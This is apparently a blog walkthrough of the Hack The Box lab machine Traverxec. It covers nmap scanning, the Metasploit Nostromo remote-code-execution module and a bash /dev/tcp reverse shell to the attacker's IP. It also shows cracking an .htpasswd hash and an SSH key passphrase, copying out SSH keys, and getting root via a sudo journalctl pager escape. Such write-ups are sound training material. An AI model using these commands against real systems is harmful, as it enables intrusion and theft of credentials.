IT Security
Security, challenges and boxes


Banner

HTB: Traverxec

Rubytox, 27th December 2019

Hello everyone!

Today, I’m going to make a writeup about Hackthebox machine Traverxec , made by jkr. This box is rated easy by the maker and is kinda easy, I think it’s a good box for a beginner because you can learn a lot of new concepts involving reading and understanding documentation: I spent a lot of time quickly overseeing it, and I missed some interesting points because of that.

As on every box, I’ll add the box’s IP as traverxec.ctf in /etc/hosts. Now let’s start!

As usual, we start with an nmap scan which gives us the following result:

$ nmap -sV -sT -sC traverxec.ctf

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-29 16:11 CET
Nmap scan report for traverxec.ctf (10.10.10.165)
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (EdDSA)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.80 seconds

I’m not sure whether there are a lot of exploits over SSH, so I think exploring the port 80 is a better idea. We see that the webserver listening on port 80 is Nostromo, which I didn’t know about. According to Wikipedia1, this web server is run by the daemon httpd.

As we can see with searchsploit, there is basically one existing exploit for Nostromo:

$ searchsploit nostromo
--------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                               |  Path
                                                                                             | (/opt/exploitdb/)
--------------------------------------------------------------------------------------------- ----------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                         | exploits/multiple/remote/47573.rb
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                         | exploits/linux/remote/35466.sh
--------------------------------------------------------------------------------------------- ----------------------------------
Shellcodes: No Result

Let’s check with Metasploit whether this vulnerability can be exploited on our target.

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS traverxec.ctf
RHOSTS => traverxec.ctf
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST tun0
LHOST => 10.10.16.46
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 10.10.10.165:80 - The target appears to be vulnerable.

Great! This means that we’re possibly going to get a reverse shell easily. For the exploitation to be easier, we’re going to open a TCP shell once Metasploit has connected.

First we listen on port 1337 with nc -vlp 1337, then we exploit with Metasploit:

msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.46:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.16.46:4444 -> 10.10.10.165:41902) at 2019-12-27 18:56:34 +0100

bash -c "exec bash -i >& /dev/tcp/10.10.16.46/1337 0>&1"

The last line is the command we use to spawn a TCP connection to our machine, which is listening on port 1337, now we have a friendly reverse shell:

www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

However this shell is low privilege, we need to explore a little bit in order to get user and root flags. Looking into the /home directory, we find a user named david:

www-data@traverxec:/home$ ls -la
drwx--x--x  7 david david 4096 Dec 27 12:57 david

Fun thing, David’s home directory can be accessed, but not read nor modified. As we don’t really know what we’re looking for at the moment, I’ll get back to this directory a bit later. When dealing with a web server, we can usually find the files it uses in /var. Here, we find our interesting files in /var/nostromo:

www-data@traverxec:/var/nostromo$ ls -la
drwxr-xr-x  2 root     daemon 4096 Oct 27 16:12 conf
drwxr-xr-x  6 root     daemon 4096 Oct 25 17:11 htdocs
drwxr-xr-x  2 root     daemon 4096 Oct 25 14:43 icons
drwxr-xr-x  2 www-data daemon 4096 Dec 27 13:00 logs

Here, the interesting directory is conf: htdocs basically contains the different files and medias used by the website which aren’t really interesting, and the other directories don’t contain anything exploitable. So let’s go to the conf directory which would contain Nostromo configuration.

www-data@traverxec:/var/nostromo/conf$ ls -la
-rw-r--r-- 1 root bin      41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin    2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin     498 Oct 25 15:20 nhttpd.conf

We first notice that there’s a .htpasswd file there, which contains the hashed password for user david:

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

We’re going to crack this hash using john and the wordlist rockyou, which gives us:

david:Nowonly4me

Now, we just need to find where do we use those credentials: the initial website doesn’t ask for authentication. Let’s look at the configuration file we find in the directory as well.

We remember from the Wikipedia article that nhttpd is the name of Nostromo web server daemon, so the file nhttpd.conf will contain the configuration elements, which are:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

Let’s explain why I highlighted the two last lines of the file. The documentation of Nostromo2 tells us that it is possible for any user to host their personal files: the homedirs entry specifies the directories containing the home directories of the users willing to host pages. Here, we see that any user located in /home can host pages: in particular, David is be able to. We learn that we can access a user’s hosted pages by accessing the URL http://traverxec.ctf/~user/. We’re going to try with David:

David's home page

At this point I was a bit stuck because it seemed to be a completely static website. The error I made was that I thought the page which was displayed in the screenshot was at the root of David’s home directory; however, I tried to access common paths such as .ssh, or the user.txt file which should contain the flag, which led to a 404 error code. This actually meant that I was in the wrong directory.

I read the documentation again and came upon a line I didn’t notice before:

You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.

This is why I highlighted the last line of the configuration file: the entry homedirs_public contains the name of the directory in which each user’s hosted files will remain. As David’s home directory is accessible, we can try to find his public_www directory:

www-data@traverxec:/home/david/public_www$ ls -la
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Dec 27 13:22 protected-file-area

We then go into the protected-file-area directory:

www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
-rw-r--r-- 1 david david    45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 10240 Oct 25 17:02 backup-ssh-identity-files.tar

We see an interesting tar archive, which is likely to contain David’s SSH keys. Here, there is several ways to get the file: we can go to the protected-file-area directory with our web browser and download the file; however we can see a .htaccess file, which restricts the access to the page. This is where the .htpasswd credentials will be useful!

There is another way which works for small files that I learned about recently: we get the base 64 encoded version of the file, copy it on our computer, and then decode it with base64 -d.

Either way, we now have a tar archive. Security note: before extracting a tar archive, we should always check its content! We can use the -t option of tar in order to see the contents and test files:

$ tar -tvf tarfile
drwx------ david/david       0 2019-10-25 23:02 home/david/.ssh/
-rw-r--r-- david/david     397 2019-10-25 23:02 home/david/.ssh/authorized_keys
-rw------- david/david    1766 2019-10-25 23:02 home/david/.ssh/id_rsa
-rw-r--r-- david/david     397 2019-10-25 23:02 home/david/.ssh/id_rsa.pub

This is useful to detect a tarbomb3 for instance.

Now, we can extract the archive and we get to the .ssh directory. We come accross id_rsa and id_rsa.pub RSA identity files, which we’re going to use to connect to the machine via SSH:

$ ssh -i id_rsa david@traverxec.ctf
Enter passphrase for key 'id_rsa':

We have to crack the key, id_rsa is a protected private key. We use the software ssh2john in order to get the hash for the passphrase, then we use john and rockyou wordlist to crack it:

$ ssh2john id_rsa > hash
$ john --wordlist=rockyou.txt hash
id_rsa:hunter

Then, we can connect using SSH:

$ ssh -i id_rsa david@traverxec.ctf
Enter passphrase for key 'id_rsa': [hunter]
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ cat user.txt
7db0b[-- REDACTED --]82f3d

We owned user!

Let’s own root now. In David’s home directory, we see a bin directory containing two files : server-stats.head and server-stats.sh. The former is just a piece of ASCII art, the latter a script which show some information about the nhttpd service:

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The most interesting line is the last one: it calls the journalctl utility using sudo; we might be able to execute something else.

First thing, we can try to change the executable being called after sudo, but it doesn’t work. It’s likely that journalctl is the only program allowed to be called using sudo without being asked for a password. This kind of behaviour can be achieved by editing /etc/sudoers. So, we need to get root with using journalctl. We can check if there exists any known way to do so with GTFOBins.

We learn4 that when the text displayed by journalctl is too long, it will spawn the default pager, which is usually less. If we are able to spawn less, then we can get a shell by typing ! bash. However, journalctl is asked to print only five lines, and we can’t change that: sudo doesn’t work if we do.

So, how is it possible to make journalctl think it has too much text to print for the actual screen resolution without altering the quantity of text it has to print? Change the screen size! We resize our terminal to the following:

Low resolution

This is enough to be able to spawn less:

Low resolution

We just have to type ! /bin/bash:

Low resolution

We owned root!

Conclusion: I thought this box was pretty fun; it allowed me to learn a lot especially about enumeration, it took a very long time for me to find the use of the homedirs_public entry. To me the user part was the hardest, root was straightforward.

I hope you liked my writeup and that it could have been useful to you!

So this is over for this box! If you have any comments or suggestions, feel free to open an issue on this website's GitHub page.

1. https://en.wikipedia.org/wiki/Nhttpd
2. https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=nhttpd
3. http://www.linfo.org/tarbomb.html
3. https://gtfobins.github.io/gtfobins/journalctl/

Copyright © 2020-2021 Rubytox